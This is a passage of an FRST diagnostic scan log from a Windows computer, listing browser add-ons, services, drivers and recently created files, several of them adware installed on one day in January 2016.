BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2016-01-01] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
BHO-x32: Search Assistant BHO -> {f236ca79-3123-4afb-9f74-e98117ad5625} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll [2015-02-11] (Mindspark)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)
Toolbar: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\MSC\McSnIePl64.dll [2015-12-03] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2015-12-03] (McAfee, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2016-01-01] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-12-03] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2016-01-01] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2016-01-01] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2016-01-01] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-12-03] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-11-02] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2011-09-28] ()
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPlugin -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin\npGCPlugin_2.0.2.10.dll [2015-10-08] (GradeCam Corporation)
FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPlugin2 -> C:\Users\Charlie\AppData\Roaming\GradeCam\GCPlugin2\2.0.2.10\npGCPlugin2_2.0.2.10.dll [2015-10-08] (GradeCam)
FF Plugin HKU\S-1-5-21-1024156207-2972793060-2867319265-1000: gradecam.com/GCPluginx64 -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin64\npGCPlugin64_2.0.2.10.dll [2015-10-08] (GradeCam Corporation)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-11-15] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2015-11-29] [not signed]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C211US0D20151117&p={searchTerms}
CHR DefaultSearchKeyword: Default -> mcafee
CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-04]
CHR Extension: (Google Docs) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]
CHR Extension: (Google Drive) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-29]
CHR Extension: (YouTube) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-01-05]
CHR Extension: (Google Search) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (Google Sheets) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-04]
CHR Extension: (SiteAdvisor) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-26]
CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]
CHR Extension: (GradeCam Helper) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lghkdmpjndggpffgahogcopicpednbgm [2015-11-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-23]
CHR Extension: (Gmail) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-03]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-02]
CHR HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lghkdmpjndggpffgahogcopicpednbgm] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-02]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [318592 2013-11-29] (Windows ® Win 7 DDK provider) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2802360 2015-11-24] (Microsoft Corporation)
S2 CLKMSVC10_99E320F5; C:\Program Files (x86)\CyberLink\PowerDVD12\Common\NavFilter\kmsvc.exe [243464 2014-05-02] (CyberLink)
R2 FromDocToPDF_65Service; C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe [90696 2015-02-11] (Mindspark)
S2 Fusion Browser Startup Service; C:\Program Files\FusionBrowser\wdsvc2.exe [298496 2015-11-24] () [File not signed]
R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [517464 2015-01-28] (Garmin Ltd or its subsidiaries)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 HPSLPSVC; C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hpslpsvc64.dll [1039360 2013-07-19] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [315352 2014-11-27] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2016-01-10] (Lavasoft Limited)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-12-03] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [679120 2015-10-20] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [233680 2015-09-21] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [378848 2015-10-21] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [256840 2015-09-21] (McAfee, Inc.)
R2 MFLService2; C:\Program Files (x86)\Get-a-Clip\MFLService2.exe [1983640 2016-01-10] ()
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [17168 2016-01-10] ()
R2 SMARTHelperService; C:\Program Files (x86)\SMART Technologies\Education Software\SMARTHelperService.exe [538416 2014-02-12] (SMART Technologies)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-06-16] (Synaptics Incorporated)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [32768 2013-08-01] (Validity Sensors, Inc.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-07-07] (Microsoft Corporation)
S2 wusvc; C:\Program Files\WebUpdater\webupdaterservice.exe [61952 2015-12-30] (Web Updater Media) [File not signed]
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-11-29] (Atheros) [File not signed]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 BTATH_LWFLT; C:\Windows\System32\DRIVERS\btath_lwflt.sys [77464 2013-11-29] (Qualcomm Atheros)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [80760 2015-09-23] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-11-08] (Intel Corporation)
S3 lehidmini; C:\Windows\system32\drivers\leath_hid.sys [39704 2013-11-29] (Atheros)
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-09-29] (McAfee, Inc.)
R3 MEIx64; C:\Windows\system32\drivers\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351120 2015-09-23] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [497888 2015-09-23] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [841944 2015-09-23] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [537192 2015-10-06] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-10-06] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [244544 2015-09-23] (McAfee, Inc.)
U5 RTSPER; C:\Windows\System32\Drivers\RTSPER.sys [476888 2014-03-21] (Realsil Semiconductor Corporation)
R3 SMARTMouseFilterx64; C:\Windows\System32\DRIVERS\SMARTMouseFilterx64.sys [10240 2014-02-12] (SMART Technologies)
R3 SMARTVHidMiniVistaAmd64; C:\Windows\System32\DRIVERS\SMARTVHidMiniVistaAmd64.sys [9216 2014-02-12] (SMART Technologies)
S3 SMARTVTabletPCx64; C:\Windows\System32\DRIVERS\SMARTVTabletPCx64.sys [22184 2014-02-12] (SMART Technologies ULC)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2014-06-16] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [31472 2014-06-16] (Synaptics Incorporated)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-10 12:42 - 2016-01-10 12:42 - 00001150 _____ C:\Users\Charlie\Desktop\FRST64 - Shortcut.lnk
2016-01-10 12:40 - 2016-01-10 12:40 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64 (2).exe
2016-01-10 12:19 - 2016-01-10 12:21 - 00067326 _____ C:\Users\Charlie\Downloads\Addition.txt
2016-01-10 12:18 - 2016-01-10 12:43 - 00042563 _____ C:\Users\Charlie\Downloads\FRST.txt
2016-01-10 12:18 - 2016-01-10 12:43 - 00000000 ____D C:\FRST
2016-01-10 12:18 - 2016-01-10 12:18 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64 (1).exe
2016-01-10 12:17 - 2016-01-10 12:17 - 02370560 _____ (Farbar) C:\Users\Charlie\Downloads\FRST64.exe
2016-01-10 11:57 - 2016-01-10 11:57 - 00003824 _____ C:\Windows\System32\Tasks\WebUpdater Task
2016-01-10 11:57 - 2016-01-10 11:57 - 00000095 _____ C:\wulog.txt
2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\Users\Charlie\AppData\Local\WebUpdater
2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WebUpdater
2016-01-10 11:56 - 2016-01-10 12:06 - 00000000 ____D C:\Users\Charlie\AppData\Local\chrome
2016-01-10 11:56 - 2016-01-10 11:56 - 00004034 _____ C:\Windows\System32\Tasks\Fusion Browser Update Task
2016-01-10 11:56 - 2016-01-10 11:56 - 00003300 _____ C:\Windows\System32\Tasks\WebUpdater LaunchTask
2016-01-10 11:56 - 2016-01-10 11:56 - 00003280 _____ C:\Windows\System32\Tasks\Fusion Browser Launch Task
2016-01-10 11:56 - 2016-01-10 11:56 - 00000977 _____ C:\Users\Public\Desktop\Fusion Browser.lnk
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Users\Charlie\AppData\Local\FusionBrowser
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\WebUpdater
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\FusionBrowser
2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ C:\Windows\SysWOW64\mfllib.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00023236 _____ C:\Windows\System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A}
2016-01-10 11:55 - 2016-01-10 11:55 - 00003572 _____ C:\Windows\System32\Tasks\One System Care Task
2016-01-10 11:55 - 2016-01-10 11:55 - 00003264 _____ C:\Windows\System32\Tasks\One System Care Monitor
2016-01-10 11:55 - 2016-01-10 11:55 - 00002860 _____ C:\Windows\System32\Tasks\One System CarePeriod
2016-01-10 11:55 - 2016-01-10 11:55 - 00001071 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-01-10 11:55 - 2016-01-10 11:55 - 00000280 _____ C:\Windows\Tasks\One System CarePeriod.job
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\One System Care
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-5c45-1
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-02f5-0
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\Get-a-Clip
2016-01-10 11:54 - 2016-01-10 11:54 - 00425744 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00345360 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00002880 _____ C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
2016-01-10 11:54 - 2016-01-10 11:54 - 00002880 _____ C:\Windows\system32\LavasoftTcpServiceOff.ini
2016-01-10 11:54 - 2016-01-10 11:54 - 00000397 _____ C:\Prefs.js
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Lavasoft
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Users\Charlie\AppData\Local\Lavasoft
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\searchplugins
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2016-01-10 11:54 - 2016-01-10 11:54 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2016-01-10 11:53 - 2016-01-10 11:53 - 00000000 ____D C:\ProgramData\Lavasoft
2016-01-10 09:58 - 2016-01-10 09:58 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-01-09 16:14 - 2016-01-09 16:14 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-01-03 17:56 - 2016-01-03 19:14 - 00000000 ____D C:\ProgramData\MSNDynFiles
2016-01-01 15:09 - 2016-01-01 15:09 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Sun
2016-01-01 15:09 - 2016-01-01 15:09 - 00000000 ____D C:\Users\Charlie\.oracle_jre_usage
2016-01-01 15:08 - 2016-01-01 15:08 - 00000000 ____D C:\Users\Charlie\AppData\LocalLow\Oracle
2016-01-01 15:06 - 2016-01-01 15:06 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-01-01 15:06 - 2016-01-01 15:06 - 00002019 _____ C:\Users\Public\Desktop\Adobe Reader XI.lnk
2015-12-11 12:38 - 2015-12-11 12:38 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-10 12:34 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-10 12:34 - 2009-07-13 23:45 - 00034432 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-10 12:31 - 2015-06-30 15:15 - 00000926 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA.job
2016-01-10 12:20 - 2014-11-03 13:41 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 12:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows
2016-01-10 11:48 - 2014-07-07 21:47 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-10 09:58 - 2014-10-18 16:32 - 00003958 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{8AA93FD4-5F8F-41DB-A04A-5E7F090BEAB9}
2016-01-09 22:57 - 2014-10-18 19:53 - 00000000 ____D C:\Users\Charlie\AppData\Local\CrashDumps
2016-01-09 21:31 - 2015-06-30 15:15 - 00000874 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core.job
2016-01-09 16:20 - 2014-11-03 13:41 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-09 07:05 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-01-07 22:52 - 2014-11-03 13:41 - 00000000 ____D C:\Users\Charlie\AppData\Local\Deployment
2016-01-07 22:47 - 2009-07-14 00:13 - 00784286 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-07 22:47 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-01-03 20:27 - 2014-11-09 13:34 - 00000000 ____D C:\Users\Charlie\Documents\Personal
2016-01-03 19:14 - 2014-10-28 15:26 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\MSN6
2016-01-03 18:48 - 2014-07-07 21:47 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-03 18:48 - 2014-07-07 21:47 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-03 18:48 - 2014-07-07 21:47 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-03 18:01 - 2015-11-17 17:36 - 00000000 __RSD C:\Users\Charlie\Documents\McAfee Vaults
2016-01-03 18:01 - 2014-10-18 16:30 - 00000000 ____D C:\Users\Charlie\Documents\Youcam
2016-01-03 18:00 - 2015-03-04 19:22 - 00000000 ___RD C:\Users\Charlie\Dropbox
2016-01-03 18:00 - 2015-03-04 19:18 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\Dropbox
2016-01-03 17:57 - 2015-11-11 13:13 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForCharlie.job
2016-01-03 17:57 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-03 05:38 - 2015-11-11 13:13 - 00003198 _____ C:\Windows\System32\Tasks\HPCeeScheduleForCharlie
2016-01-01 15:09 - 2015-02-20 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-01 15:09 - 2014-10-18 16:27 - 00000000 ____D C:\Users\Charlie
2016-01-01 15:08 - 2015-02-20 21:19 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-01-01 15:08 - 2015-02-20 21:18 - 00000000 ____D C:\Program Files (x86)\Java
2016-01-01 15:04 - 2014-07-07 21:50 - 00000000 ____D C:\ProgramData\Adobe
2016-01-01 15:04 - 2014-07-07 21:50 - 00000000 ____D C:\Program Files (x86)\Adobe
